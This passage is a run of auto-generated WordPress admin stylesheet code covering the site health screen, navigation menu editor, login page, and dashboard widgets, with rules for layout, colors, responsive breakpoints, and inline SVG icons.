td:first-child{width:30%}.health-check-table td{width:70%}.health-check-table ol,.health-check-table ul{margin:0}.health-check-body li{line-height:1.5}.health-check-body .good::before,.health-check-body .pass::before{content:"\f147";content:"\f147"/'';color:#00a32a}.health-check-body .warning::before{content:"\f460";content:"\f460"/'';color:#dba617}.health-check-body .info::before{content:"\f348";content:"\f348"/'';color:#72aee6}.health-check-body .error::before,.health-check-body .fail::before{content:"\f335";content:"\f335"/'';color:#d63638}.site-health-copy-buttons{margin:1rem 0}.site-health-copy-buttons .copy-button-wrapper{display:inline-flex;align-items:center;margin:.5rem 0 1rem}.site-health-copy-buttons .success{color:#007017;margin-right:.5rem}.site-status-has-issues.hide{display:none}.site-health-view-more{text-align:center}.site-health-issues-wrapper:first-of-type{margin-top:3rem}.site-health-issues-wrapper{margin-bottom:3rem;margin-top:2rem}.site-status-all-clear{display:flex;flex-direction:column;align-items:center;justify-content:center;text-align:center;height:100%;width:100%;margin:0 0 3rem}@media all and (min-width:784px){.site-status-all-clear{margin:2rem 0 5rem}}.site-status-all-clear.hide{display:none}.site-status-all-clear .dashicons{font-size:150px;height:150px;margin-bottom:2rem;width:150px}.site-status-all-clear .encouragement{font-size:1.5rem;font-weight:600}.site-status-all-clear p{margin:0}.wp-core-ui .button.site-health-view-passed{position:relative;padding-left:40px;padding-right:20px}.health-check-wp-paths-sizes.spinner{visibility:visible;float:none;margin:0 4px;flex-shrink:0}#dashboard_site_health .site-health-details{padding-right:16px}#dashboard_site_health .site-health-details p:first-child{margin-top:0}#dashboard_site_health .site-health-details p:last-child{margin-bottom:0}#dashboard_site_health .health-check-widget{display:grid;grid-template-columns:1fr 2fr;grid-auto-rows:minmax(64px,auto);column-gap:16px;align-items:center}#dashboard_site_health .site-health-progress-label{margin-right:0}.health-check-widget-title-section{margin-bottom:0;text-align:center}@media screen and (max-width:480px){#dashboard_site_health .health-check-widget{grid-template-columns:100%}}@media screen and (max-width:782px){.site-health-issues-wrapper .health-check-accordion-trigger{flex-direction:column;align-items:flex-start}.health-check-accordion-trigger .badge{margin:1em 0 0}.health-check-table{table-layout:fixed}.health-check-table td,.health-check-table th{box-sizing:border-box;display:block;width:100%;word-wrap:break-word}.health-check-table td:first-child,.widefat.health-check-table th{width:100%;padding-bottom:0;font-weight:600}.wp-core-ui .site-health-copy-buttons .copy-button{margin-bottom:0}}/*! This file is auto-generated */ .no-js #message{display:block}ul.add-menu-item-tabs li{padding:3px 5px 4px 8px}.accordion-section ul.add-menu-item-tabs,.accordion-section ul.category-tabs,.accordion-section ul.wp-tab-bar{margin:0}.accordion-section .categorychecklist{margin:13px 0}#nav-menu-meta .accordion-section-content{padding:18px 13px;resize:vertical}#nav-menu-meta .button-controls{margin-bottom:0}.has-no-menu-item .button-controls{display:none}#nav-menus-frame{margin-left:300px;margin-top:23px}#wpbody-content #menu-settings-column{display:inline;width:281px;margin-left:-300px;clear:both;float:left;padding-top:0}#menu-settings-column .inside{clear:both;margin:10px 0 0;height:100%;max-height:inherit}#menu-settings-column .categorydiv,#menu-settings-column .customlinkdiv,#menu-settings-column .posttypediv,#menu-settings-column .taxonomydiv{max-height:inherit;height:100%}#menu-settings-column .categorydiv div.tabs-panel,#menu-settings-column .customlinkdiv div.tabs-panel,#menu-settings-column .posttypediv div.tabs-panel,#menu-settings-column .taxonomydiv div.tabs-panel,#menu-settings-column .wp-tab-panel{max-height:calc(100% - 75px);height:100%}.metabox-holder-disabled .accordion-section-content,.metabox-holder-disabled .accordion-section-title,.metabox-holder-disabled .postbox{opacity:.5}.metabox-holder-disabled .button-controls .select-all{display:none}#wpbody{position:relative}.is-submenu{color:#50575e;font-style:italic;font-weight:400;margin-left:4px}.manage-menus{margin-top:23px;padding:10px;overflow:hidden;background:#fff}.manage-menus .selected-menu,.manage-menus .submit-btn,.manage-menus select,.nav-menus-php .add-new-menu-action{display:inline-block;margin-right:3px;vertical-align:middle}.manage-menus select,.menu-location-menus select{max-width:100%}.menu-edit #post-body-content h3{margin:1em 0 10px}#nav-menu-bulk-actions-top{margin:1em 0}#nav-menu-bulk-actions-bottom{margin:1em 0;margin:calc(1em + 9px) 0}.bulk-actions input.button{margin-right:12px}.bulk-select-button{position:relative;display:inline-block;padding:0 10px;font-size:13px;line-height:2.15384615;height:auto;min-height:30px;background:#f6f7f7;vertical-align:top;border:1px solid #dcdcde;margin:0;cursor:pointer;border-radius:3px;white-space:nowrap;box-sizing:border-box}.bulk-selection .bulk-select-button{color:#2271b1;border-color:#2271b1;background:#f6f7f7;vertical-align:top}#pending-menu-items-to-delete{display:none}.bulk-selection #pending-menu-items-to-delete{display:block;margin-top:1em}#pending-menu-items-to-delete p{margin-bottom:0}#pending-menu-items-to-delete ul{margin-top:0;list-style:none}#pending-menu-items-to-delete ul li{display:inline}input.bulk-select-switcher+.bulk-select-button-label{vertical-align:inherit}label.bulk-select-button:active,label.bulk-select-button:focus-within,label.bulk-select-button:hover{background:#f0f0f1;border-color:#0a4b78;color:#0a4b78}input.bulk-select-switcher:focus+.bulk-select-button-label{color:#0a4b78}.bulk-actions input.menu-items-delete{appearance:none;font-size:inherit;border:0;line-height:2.1em;background:0 0;cursor:pointer;text-decoration:underline;color:#b32d2e}.bulk-actions input.menu-items-delete:hover{color:#b32d2e;border:none}.bulk-actions input.menu-items-delete.disabled{display:none}.menu-settings{border-top:1px solid #f0f0f1;margin-top:2em}.menu-settings-group{margin:0 0 10px;padding-left:20%}.menu-settings-group:last-of-type{margin-bottom:0}.menu-settings-input{float:left;margin:0;width:100%}.menu-settings-group-name{float:left;clear:both;width:25%;padding:3px 0 0;margin-left:-25%}.menu-settings label{vertical-align:baseline}.menu-edit .checkbox-input{margin-top:4px}.theme-location-set{color:#646970;font-size:11px}#menu-management-liquid{float:left;min-width:100%;margin-top:3px}#menu-management{position:relative;margin-right:20px;margin-top:-3px;width:100%}#menu-management .menu-edit{margin-bottom:20px}.nav-menus-php #post-body{padding:0 10px;border-top:1px solid #fff;border-bottom:1px solid #dcdcde;background:#fff}#nav-menu-footer,#nav-menu-header{padding:0 10px;background:#f6f7f7}#nav-menu-header{border-bottom:1px solid #dcdcde;margin-bottom:0}#nav-menu-header .menu-name-label{display:inline-block;vertical-align:middle;margin-right:7px}.nav-menus-php #post-body div.error,.nav-menus-php #post-body div.updated{margin:0}.nav-menus-php #post-body-content{position:relative;float:none}.nav-menus-php #post-body-content .post-body-plain{margin-bottom:0}#menu-management .menu-add-new abbr{font-weight:600}#select-nav-menu-container{text-align:right;padding:0 10px 3px;margin-bottom:5px}#select-nav-menu{width:100px;display:inline}#menu-name-label{margin-top:-2px}.widefat .menu-locations .menu-location-title{padding:13px 10px 0}.menu-location-title label{font-weight:600}.menu-location-menus select{float:left}#locations-nav-menu-wrapper{padding:5px 0}.locations-nav-menu-select select{float:left;width:160px;margin-right:5px}.locations-row-links{float:left;margin:6px 0 0 6px}.locations-add-menu-link,.locations-edit-menu-link{margin:0 3px}.locations-edit-menu-link{padding-right:3px;border-right:1px solid #c3c4c7}#menu-management .inside{padding:0 10px}.postbox .howto input{width:180px;float:right}.accordion-container .outer-border{margin:0}.customlinkdiv p{margin-top:0}#nav-menu-theme-locations .howto select{width:100%}#nav-menu-theme-locations .button-controls{text-align:right}.add-menu-item-view-all{height:400px}#menu-container .submit{margin:0 0 10px;padding:0}#cancel-save{text-decoration:underline;font-size:12px;margin-left:20px;margin-top:5px}.button-primary.right,.button-secondary.right,.button.right{float:right}.list-controls{float:left}.add-to-menu{float:right}.button-controls{clear:both;margin:10px 0}.hide-all,.show-all{cursor:pointer}.hide-all{display:none}#menu-name{width:270px;vertical-align:middle}#manage-menu .inside{padding:0}#available-links dt{display:block}#add-custom-link .howto{font-size:12px}#add-custom-link label span{display:block;float:left;margin-top:5px;padding-right:5px}.menu-item-textbox{width:180px}.customlinkdiv .menu-item-textbox{width:100%}.nav-menus-php .howto span{float:left;margin-top:6px}.quick-search{width:190px}.quick-search-wrap .spinner{float:none;margin:-3px -10px 0 0}.nav-menus-php .list-wrap{display:none;clear:both;margin-bottom:10px}.nav-menus-php .postbox p.submit{margin-bottom:0}.nav-menus-php .list li{display:none;margin:0 0 5px}.nav-menus-php .list li .menu-item-title{cursor:pointer;display:block}.nav-menus-php .list li .menu-item-title input{margin-right:3px;margin-top:-3px}.menu-item-title input[type=checkbox]{display:inline-block;margin-top:-4px}.menu-item-title .post-state{font-weight:600}#menu-container .inside{padding-bottom:10px}.menu{padding-top:1em}#menu-to-edit{margin:0;padding:.1em 0}.menu ul{width:100%}.menu li{margin-bottom:0;position:relative}.menu-item-bar{clear:both;line-height:1.5;position:relative;margin:9px 0 0}.menu-item-bar .menu-item-handle{border:1px solid #dcdcde;position:relative;padding:10px 15px;height:auto;min-height:20px;max-width:382px;line-height:2.30769230;overflow:hidden;word-wrap:break-word}.menu-item-bar .menu-item-handle:hover{border-color:#8c8f94}#menu-to-edit .menu-item-invalid .menu-item-handle{background:#fcf0f1;border-color:#d63638}.no-js .menu-item-edit-active .item-edit{display:none}.js .menu-item-handle{cursor:move}.menu li.deleting .menu-item-handle{background-image:none;background-color:#f86368}.menu-item-handle .item-title{font-size:13px;font-weight:600;line-height:1.53846153;display:block;margin-right:13em}.menu-item-handle .menu-item-checkbox{display:none}.bulk-selection .menu-item-handle .menu-item-checkbox{display:inline-block;margin-right:6px}.menu-item-handle .menu-item-title.no-title{color:#646970}li.menu-item.ui-sortable-helper .menu-item-bar{margin-top:0}li.menu-item.ui-sortable-helper .menu-item-transport .menu-item-bar{margin-top:9px}.menu .sortable-placeholder{height:35px;width:410px;margin-top:9px}.menu-item .menu-item-transport:empty{display:none}.menu-item-depth-0{margin-left:0}.menu-item-depth-1{margin-left:30px}.menu-item-depth-2{margin-left:60px}.menu-item-depth-3{margin-left:90px}.menu-item-depth-4{margin-left:120px}.menu-item-depth-5{margin-left:150px}.menu-item-depth-6{margin-left:180px}.menu-item-depth-7{margin-left:210px}.menu-item-depth-8{margin-left:240px}.menu-item-depth-9{margin-left:270px}.menu-item-depth-10{margin-left:300px}.menu-item-depth-11{margin-left:330px}.menu-item-depth-0 .menu-item-transport{margin-left:0}.menu-item-depth-1 .menu-item-transport{margin-left:-30px}.menu-item-depth-2 .menu-item-transport{margin-left:-60px}.menu-item-depth-3 .menu-item-transport{margin-left:-90px}.menu-item-depth-4 .menu-item-transport{margin-left:-120px}.menu-item-depth-5 .menu-item-transport{margin-left:-150px}.menu-item-depth-6 .menu-item-transport{margin-left:-180px}.menu-item-depth-7 .menu-item-transport{margin-left:-210px}.menu-item-depth-8 .menu-item-transport{margin-left:-240px}.menu-item-depth-9 .menu-item-transport{margin-left:-270px}.menu-item-depth-10 .menu-item-transport{margin-left:-300px}.menu-item-depth-11 .menu-item-transport{margin-left:-330px}body.menu-max-depth-0{min-width:950px!important}body.menu-max-depth-1{min-width:980px!important}body.menu-max-depth-2{min-width:1010px!important}body.menu-max-depth-3{min-width:1040px!important}body.menu-max-depth-4{min-width:1070px!important}body.menu-max-depth-5{min-width:1100px!important}body.menu-max-depth-6{min-width:1130px!important}body.menu-max-depth-7{min-width:1160px!important}body.menu-max-depth-8{min-width:1190px!important}body.menu-max-depth-9{min-width:1220px!important}body.menu-max-depth-10{min-width:1250px!important}body.menu-max-depth-11{min-width:1280px!important}.item-type{display:inline-block;padding:12px 16px;color:#646970;font-size:12px;line-height:1.5}.item-controls{font-size:12px;position:absolute;right:20px;top:-1px}.item-controls a{text-decoration:none}.item-controls a:hover{cursor:pointer}.item-controls .item-order{padding-right:10px}.nav-menus-php .item-edit{position:absolute;right:-20px;top:0;display:block;width:30px;height:40px;outline:0}.no-js.nav-menus-php .item-edit{position:static;float:right;width:auto;height:auto;margin:12px -10px 12px 0;padding:0;color:#2271b1;text-decoration:underline;font-size:12px;line-height:1.5}.no-js.nav-menus-php .item-edit .screen-reader-text{position:static;clip-path:none;width:auto;height:auto;margin:0}.nav-menus-php .item-edit:before{margin-top:10px;margin-left:4px;width:20px;border-radius:50%;text-indent:-1px}.no-js.nav-menus-php .item-edit:before{display:none}.rtl .nav-menus-php .item-edit:before{text-indent:1px}.js.nav-menus-php .item-edit:focus{box-shadow:none}.nav-menus-php .item-edit:focus:before{box-shadow:0 0 0 var(--wp-admin-border-width-focus,1.5px) var(--wp-admin-theme-color,#3858e9);outline:2px solid transparent}.menu-instructions-inactive{display:none}.menu-item-settings{display:block;max-width:392px;padding:10px;position:relative;z-index:10;border:1px solid #c3c4c7;border-top:none;box-shadow:0 1px 1px rgba(0,0,0,.04)}.menu-item-settings .field-move{margin:3px 0 5px;line-height:1.5}.field-move-visual-label{float:left;margin-right:4px}.menu-item-settings .field-move .button-link{display:none;margin:0 2px}.menu-item-edit-active .menu-item-settings{display:block}.menu-item-edit-inactive .menu-item-settings{display:none}.add-menu-item-pagelinks{margin:.5em -10px;text-align:center}.add-menu-item-pagelinks .page-numbers{display:inline-block;min-width:20px}.add-menu-item-pagelinks .page-numbers.dots{min-width:0}.link-to-original{display:block;margin:0 0 15px;padding:3px 5px 5px;border:1px solid #dcdcde;color:#646970;font-size:12px}.link-to-original a{padding-left:4px;font-style:normal}.hidden-field{display:none}.description-group{display:flex;column-gap:10px}.description-group>*{flex-grow:1}.menu-item-actions{padding-top:15px;padding-bottom:7px}#cancel-save{cursor:pointer}.nav-menus-php .major-publishing-actions{padding:10px 0;display:flex;align-items:center}.nav-menus-php .major-publishing-actions>*{margin-right:10px}.nav-menus-php .major-publishing-actions .form-invalid{padding-left:4px;margin-left:-4px}#menu-item-name-wrap,#menu-item-url-wrap,#nav-menus-frame{display:block}.button-controls{display:flex;align-items:center;justify-content:space-between}.button-controls-customlinkdiv{justify-content:flex-end}@media only screen and (min-width:769px) and (max-width:1000px){body.menu-max-depth-0{min-width:0!important}#menu-management-liquid{width:100%}.nav-menus-php #post-body-content{min-width:0}}@media screen and (max-width:782px){body.nav-menus-php,body.wp-customizer{min-width:0!important}#nav-menus-frame{margin-left:0;float:none;width:100%}#wpbody-content #menu-settings-column{display:block;width:100%;float:none;margin-left:0}#side-sortables .add-menu-item-tabs{margin:15px 0 14px}ul.add-menu-item-tabs li.tabs{padding:13px 15px 14px}.nav-menus-php .customlinkdiv .howto input{width:65%}.nav-menus-php .quick-search{width:85%}#menu-management-liquid{margin-top:25px}.nav-menus-php .menu-name-label.howto span{margin-top:13px}#menu-name{width:100%}.nav-menus-php #nav-menu-header .major-publishing-actions .publishing-action{padding-top:1em}.nav-menus-php .delete-action{font-size:14px;line-height:2.14285714}.menu-item-bar .menu-item-handle,.menu-item-settings{width:auto}.menu-item-settings{padding:10px}.menu-item-settings .description-group{display:block}.menu-item-settings input{width:100%}.menu-item-settings input[type=checkbox],.menu-item-settings input[type=radio]{width:25px}.menu-settings-group{padding-left:0;overflow:visible}.menu-settings-group-name{float:none;width:auto;margin-left:0;margin-bottom:15px}.menu-settings-input{float:none;margin-bottom:15px}.menu-edit .checkbox-input{margin-top:0}.manage-menus select{margin:.5em 0}.wp-core-ui .manage-menus .button{margin-bottom:0}.widefat .menu-locations .menu-location-title{padding-top:16px}}@media only screen and (min-width:783px){@supports (position:sticky) and (scroll-margin-bottom:130px){#nav-menu-footer{position:sticky;bottom:0;z-index:10;box-shadow:0 -1px 0 0 #ddd}#save_menu_header{display:none}}}@media only screen and (max-width:768px){#menu-locations-wrap .widefat{width:100%}.bulk-select-button{padding:5px 10px}}/*! This file is auto-generated */ html, body { height: 100%; margin: 0; padding: 0; } body { background: #f0f0f1; min-width: 0; color: #3c434a; font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif; font-size: 13px; line-height: 1.4; } a { color: var(--wp-admin-theme-color-darker-10); transition-property: border, background, color; transition-duration: .05s; transition-timing-function: ease-in-out; } a { outline: 0; } a:hover, a:active { color: var(--wp-admin-theme-color-darker-20); } a:focus { color: #043959; box-shadow: 0 0 0 var(--wp-admin-border-width-focus, 1.5px) var(--wp-admin-theme-color, #3858e9); /* Only visible in Windows High Contrast mode */ outline: 2px solid transparent; } p { line-height: 1.5; } .login .message, .login .notice, .login .success { border-right: 4px solid #3858e9; padding: 8px 12px; margin-top: 0; margin-right: 0; margin-bottom: 20px; background-color: #fff; word-wrap: break-word; } .login .message p, .login .notice p, .login .success p { font-size: 13px; line-height: 1.54; margin: 0.5em 0; } .login .success { border-right-color: #4ab866; background-color: #eff9f1; } /* Match border color from common.css */ .login .notice-error { border-right-color: #cc1818; background-color: #fcf0f0; } .login .login-error-list { list-style: none; } .login .login-error-list li + li { margin-top: 4px; } #loginform p.submit, .login-action-lostpassword p.submit { border: none; margin: -10px 0 20px; /* May want to revisit this */ } .login * { margin: 0; padding: 0; } .login .input::-ms-clear { display: none; } .login .pw-weak { margin-bottom: 15px; } /* rtl:ignore */ .login .button.wp-hide-pw { background: transparent; border: 1px solid transparent; box-shadow: none; font-size: 14px; line-height: normal; width: 2.5rem; height: 2.5rem; min-width: 40px; min-height: 40px; margin: 0; padding: 5px 9px; position: absolute; right: 0; top: 0; } .login .button.wp-hide-pw:hover { background: transparent; } .login .button.wp-hide-pw:focus { background: transparent; border-color: var(--wp-admin-theme-color); box-shadow: 0 0 0 1px var(--wp-admin-theme-color); /* Only visible in Windows High Contrast mode */ outline: 2px solid transparent; } .login .button.wp-hide-pw:active { background: transparent; box-shadow: none; transform: none; } .login .button.wp-hide-pw .dashicons { width: 1.25rem; height: 1.25rem; } .login .wp-pwd { position: relative; } .no-js .hide-if-no-js { display: none; } .login form { margin: 24px 0; padding: 26px 24px; font-weight: 400; overflow: hidden; background: #fff; border: 1px solid #c3c4c7; box-shadow: 0 1px 3px rgba(0, 0, 0, 0.04); } .login form.shake { animation: shake 0.2s cubic-bezier(.19,.49,.38,.79) both; animation-iteration-count: 3; transform: translateX(0); } @keyframes shake { 25% { transform: translateX(20px); } 75% { transform: translateX(-20px); } 100% { transform: translateX(0); } } @media (prefers-reduced-motion: reduce) { .login form.shake { animation: none; transform: none; } } .login-action-confirm_admin_email #login { width: 60vw; max-width: 650px; margin-top: -2vh; } @media screen and (max-width: 782px) { .login-action-confirm_admin_email #login { box-sizing: border-box; margin-top: 0; padding-right: 4vw; padding-left: 4vw; width: 100vw; } } .login form .forgetmenot { font-weight: 400; float: right; margin-bottom: 0; } .login .button-primary { float: left; } .login .reset-pass-submit { display: flex; flex-flow: row wrap; justify-content: space-between; } .login .reset-pass-submit .button { display: inline-block; float: none; margin-bottom: 6px; } .login .admin-email-confirm-form .submit { text-align: center; } .admin-email__later { text-align: right; } .login form p.admin-email__details { margin: 1.1em 0; } .login .admin-email__heading { border-bottom: 1px #f0f0f1 solid; color: #50575e; font-weight: normal; padding-bottom: 0.5em; text-align: right; } .admin-email__actions div { padding-top: 1.5em; } .login .admin-email__actions .button-primary { float: none; margin-right: 0.25em; margin-left: 0.25em; } #login form p { margin-bottom: 0; } #login form .indicator-hint, #login #reg_passmail { margin-bottom: 16px; } #login form p.submit { margin: 0; padding: 0; } .login label { font-size: 14px; line-height: 1.5; display: inline-block; margin-bottom: 3px; } .login .forgetmenot label, .login .pw-weak label { line-height: 1.5; vertical-align: baseline; } .login h1 { text-align: center; } .login h1 a { background-image: url(../images/w-logo-gray.png?ver=20260303); background-image: none, url(../images/wordpress-logo-gray.svg?ver=20260303); background-size: 84px; background-position: center top; background-repeat: no-repeat; color: #3c434a; height: 84px; font-size: 20px; font-weight: 400; line-height: 1.3; margin: 0 auto 24px; padding: 0; text-decoration: none; width: 84px; text-indent: -9999px; outline: none; overflow: hidden; display: block; } #login { width: 320px; padding: 5% 0 0; margin: auto; } .login #nav, .login #backtoblog { font-size: 13px; padding: 0 24px; } .login #nav { margin: 24px 0 0; } #backtoblog { margin: 16px 0; word-wrap: break-word; } .login #nav a, .login #backtoblog a { text-decoration: none; color: #50575e; } .login #nav a:hover, .login #backtoblog a:hover, .login h1 a:hover { color: var(--wp-admin-theme-color-darker-20); } .login #nav a:focus, .login #backtoblog a:focus, .login h1 a:focus { color: #043959; } .login .privacy-policy-page-link { text-align: center; width: 100%; margin: 3em 0 2em; } .login form .input, .login input[type="text"], .login input[type="password"] { font-size: 24px; line-height: 1.33333333; /* 32px */ width: 100%; border-width: 0.0625rem; padding: 0.1875rem 0.3125rem; /* 3px 5px */ margin: 0 0 16px 6px; min-height: 40px; max-height: none; } .login input.password-input { font-family: Consolas, Monaco, monospace; } /* rtl:ignore */ .js.login input.password-input { padding-right: 2.5rem; } .js.login-action-resetpass input[type="text"], .js.login-action-resetpass input[type="password"], .js.login-action-rp input[type="text"], .js.login-action-rp input[type="password"] { margin-bottom: 0; } .login #pass-strength-result { font-weight: 600; margin: -1px 0 16px 5px; padding: 6px 5px; text-align: center; width: 100%; } body.interim-login { height: auto; } .interim-login #login { padding: 0; margin: 5px auto 20px; } .interim-login.login h1 a { width: auto; } .interim-login #login_error, .interim-login.login .message { margin: 0 0 16px; } .interim-login.login form { margin: 0; } /* Hide visually but not from screen readers */ .screen-reader-text, .screen-reader-text span { border: 0; clip-path: inset(50%); height: 1px; margin: -1px; overflow: hidden; padding: 0; position: absolute; width: 1px; /* Many screen reader and browser combinations announce broken words as they would appear visually. */ word-wrap: normal !important; word-break: normal !important; } /* Hide the Edge "reveal password" native button */ input::-ms-reveal { display: none; } #language-switcher { padding: 0; overflow: visible; background: none; border: none; box-shadow: none; } #language-switcher select { margin-left: 0.25em; } .language-switcher { margin: 0 auto; padding: 0 0 24px; text-align: center; } .language-switcher label { margin-left: 0.25em; } .language-switcher label .dashicons { width: auto; height: auto; } .login .language-switcher .button { margin-bottom: 0; } @media screen and (max-height: 550px) { #login { padding: 20px 0; } #language-switcher { margin-top: 0; } } @media screen and (max-width: 782px) { .interim-login input[type=checkbox] { width: 1rem; height: 1rem; } .interim-login input[type=checkbox]:checked:before { width: 1.3125rem; height: 1.3125rem; margin: -0.1875rem -0.25rem 0 0; } #language-switcher label, #language-switcher select { margin-left: 0; } } @media screen and (max-width: 400px) { .login .language-switcher .button { display: block; margin: 5px auto 0; } } /*! This file is auto-generated */ @import url(common.min.css); @import url(forms.min.css); @import url(admin-menu.min.css); @import url(dashboard.min.css); @import url(list-tables.min.css); @import url(edit.min.css); @import url(revisions.min.css); @import url(media.min.css); @import url(themes.min.css); @import url(about.min.css); @import url(nav-menus.min.css); @import url(widgets.min.css); @import url(site-icon.min.css); @import url(l10n.min.css); @import url(site-health.min.css); /*! This file is auto-generated */ #wpbody-content #dashboard-widgets.columns-1 .postbox-container{width:100%}#wpbody-content #dashboard-widgets.columns-2 .postbox-container{width:49.5%}#wpbody-content #dashboard-widgets.columns-2 #postbox-container-2,#wpbody-content #dashboard-widgets.columns-2 #postbox-container-3,#wpbody-content #dashboard-widgets.columns-2 #postbox-container-4{float:left;width:50.5%}#wpbody-content #dashboard-widgets.columns-3 .postbox-container{width:33.5%}#wpbody-content #dashboard-widgets.columns-3 #postbox-container-1{width:33%}#wpbody-content #dashboard-widgets.columns-3 #postbox-container-3,#wpbody-content #dashboard-widgets.columns-3 #postbox-container-4{float:left}#wpbody-content #dashboard-widgets.columns-4 .postbox-container{width:25%}#dashboard-widgets .postbox-container{width:25%}#dashboard-widgets-wrap .columns-3 #postbox-container-4 .empty-container{border:none!important}#dashboard-widgets-wrap{overflow:hidden;margin:0 -8px}#dashboard-widgets .postbox{border-radius:8px}#dashboard-widgets .postbox-header .hndle{padding:12px 16px}#dashboard-widgets .postbox .inside{margin-bottom:0}#dashboard-widgets .meta-box-sortables{display:flow-root;min-height:0;margin:0 8px 20px}#dashboard-widgets .meta-box-sortables:not(:empty){margin-bottom:16px}#dashboard-widgets .postbox-container .empty-container{outline:2px dashed rgb(0,0,0,.15);outline-offset:-2px;border-radius:8px;height:250px;margin:4px}.is-dragging-metaboxes #dashboard-widgets .meta-box-sortables{border-radius:8px;background:rgb(var(--wp-admin-theme-color--rgb),.04);min-height:100px}.is-dragging-metaboxes #dashboard-widgets .postbox-container .empty-container{background:rgb(0,0,0,.01)}#dashboard-widgets .postbox-container .empty-container:after{content:attr(data-emptystring);margin:auto;position:absolute;top:50%;right:0;left:0;transform:translateY(-50%);padding:0 2em;text-align:center;color:#646970;font-size:16px;line-height:1.5;display:none}#the-comment-list td.comment p.comment-author{margin-top:0;margin-right:0}#the-comment-list p.comment-author img{float:right;margin-left:8px}#the-comment-list p.comment-author strong a{border:none}#the-comment-list td{vertical-align:top}#the-comment-list td.comment{word-wrap:break-word}#the-comment-list td.comment img{max-width:100%}.index-php #screen-meta-links{margin:0 0 8px 20px}.welcome-panel{position:relative;overflow:auto;margin:16px 0;border-radius:8px;font-size:14px;line-height:1.3;clear:both}.welcome-panel h2{margin:0;font-size:48px;font-weight:600;line-height:1.25}.welcome-panel h3{margin:0;font-size:20px;font-weight:400;line-height:1.4}.welcome-panel p{font-size:inherit;line-height:inherit}.welcome-panel-header{position:relative;color:#fff}.welcome-panel-header-image{position:absolute!important;top:0;left:0;bottom:0;right:0;z-index:0!important;overflow:hidden}.welcome-panel-header-image svg{display:block;margin:auto;width:100%;height:100%}.rtl .welcome-panel-header-image svg{transform:scaleX(-1)}.welcome-panel-header *{color:inherit;position:relative;z-index:1}.welcome-panel-header a:focus,.welcome-panel-header a:hover{color:inherit;text-decoration:none}.welcome-panel .welcome-panel-close:focus,.welcome-panel-header a:focus{outline-color:currentColor;outline-offset:1px;box-shadow:none}.welcome-panel-header p{margin:.5em 0 0;font-size:20px;line-height:1.4}.welcome-panel .welcome-panel-close{display:flex;align-items:center;position:absolute;top:10px;left:10px;padding:10px 15px;font-size:13px;line-height:1.23076923;text-decoration:none;z-index:1}.welcome-panel .welcome-panel-close:before{transition:all .1s ease-in-out;content:'\f335';font-size:24px;color:#fff}.welcome-panel .welcome-panel-close{color:#fff}.welcome-panel .welcome-panel-close:focus,.welcome-panel .welcome-panel-close:focus::before,.welcome-panel .welcome-panel-close:hover,.welcome-panel .welcome-panel-close:hover::before{color:#fff972}.wp-core-ui .welcome-panel .button.button-hero{margin:15px 0 3px 13px;padding:12px 36px;height:auto;line-height:1.4285714;white-space:normal}.welcome-panel-content{min-height:400px;display:flex;flex-direction:column;justify-content:space-between}.welcome-panel-header-wrap{background-color:#151515}.welcome-panel-header{box-sizing:border-box;margin-right:auto;margin-left:auto;max-width:1500px;width:100%;padding:48px 48px 80px 0}.welcome-panel .welcome-panel-column-container{box-sizing:border-box;width:100%;clear:both;display:grid;z-index:1;padding:24px;grid-template-columns:repeat(3,1fr);gap:32px;align-self:flex-end;background:#fff;border:1px solid #c3c4c7;border-top:0;border-radius:0 0 8px 8px}[class*=welcome-panel-icon]{height:60px;width:60px;background-position:center;background-size:24px 24px;background-repeat:no-repeat;border-radius:100%}.welcome-panel-column>svg{margin-top:4px}.welcome-panel-column{display:grid;grid-template-columns:min-content 1fr;gap:24px}.welcome-panel-icon-pages{background-image:url("data:image/svg+xml,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 24 24'%3E%3Cpath fill='%23fff' d='M7 13.8h6v-1.5H7v1.5zM18 16V4c0-1.1-.9-2-2-2H6c-1.1 0-2 .9-2 2v12c0 1.1.9 2 2 2h10c1.1 0 2-.9 2-2zM5.5 16V4c0-.3.2-.5.5-.5h10c.3 0 .5.2.5.5v12c0 .3-.2.5-.5.5H6c-.3 0-.5-.2-.5-.5zM7 10.5h8V9H7v1.5zm0-3.3h8V5.8H7v1.4zM20.2 6v13c0 .7-.6 1.2-1.2 1.2H8v1.5h11c1.5 0 2.7-1.2 2.7-2.8V6h-1.5z' /%3E%3C/svg%3E")}.welcome-panel-icon-layout{background-image:url("data:image/svg+xml,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 24 24'%3E%3Cpath fill='%23fff' d='M18 5.5H6a.5.5 0 00-.5.5v3h13V6a.5.5 0 00-.5-.5zm.5 5H10v8h8a.5.5 0 00.5-.5v-7.5zm-10 0h-3V18a.5.5 0 00.5.5h2.5v-8zM6 4h12a2 2 0 012 2v12a2 2 0 01-2 2H6a2 2 0 01-2-2V6a2 2 0 012-2z' /%3E%3C/svg%3E")}.welcome-panel-icon-styles{background-image:url("data:image/svg+xml,%3Csvg viewBox='0 0 24 24' xmlns='http://www.w3.org/2000/svg'%3E%3Cpath fill='%23fff' d='M12 4c-4.4 0-8 3.6-8 8v.1c0 4.1 3.2 7.5 7.2 7.9h.8c4.4 0 8-3.6 8-8s-3.6-8-8-8zm0 15V5c3.9 0 7 3.1 7 7s-3.1 7-7 7z' /%3E%3C/svg%3E")}.welcome-panel .welcome-widgets-menus{line-height:1.14285714}.welcome-panel .welcome-panel-column ul{margin:.8em 0 1em 1em}.welcome-panel li{font-size:14px}.welcome-panel li a{text-decoration:none}.welcome-panel .welcome-panel-column li{line-height:1.14285714;list-style-type:none;padding:0 0 8px}.welcome-panel .welcome-icon{background:0 0!important}#dashboard_right_now .search-engines-info:before,#dashboard_right_now li a:before,#dashboard_right_now li span:before,.welcome-panel .welcome-icon:before{color:#646970;font:normal 20px/1 dashicons;display:inline-block;padding:0 0 0 10px;position:relative;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale;text-decoration:none!important;vertical-align:top}.welcome-panel .welcome-edit-page:before,.welcome-panel .welcome-write-blog:before{content:"\f119";content:"\f119"/'';top:-3px}.welcome-panel .welcome-add-page:before{content:"\f132";content:"\f132"/'';top:-1px}.welcome-panel .welcome-setup-home:before{content:"\f102";content:"\f102"/'';top:-1px}.welcome-panel .welcome-view-site:before{content:"\f115";content:"\f115"/'';top:-2px}.welcome-panel .welcome-widgets-menus:before{content:"\f116";content:"\f116"/'';top:-2px}.welcome-panel 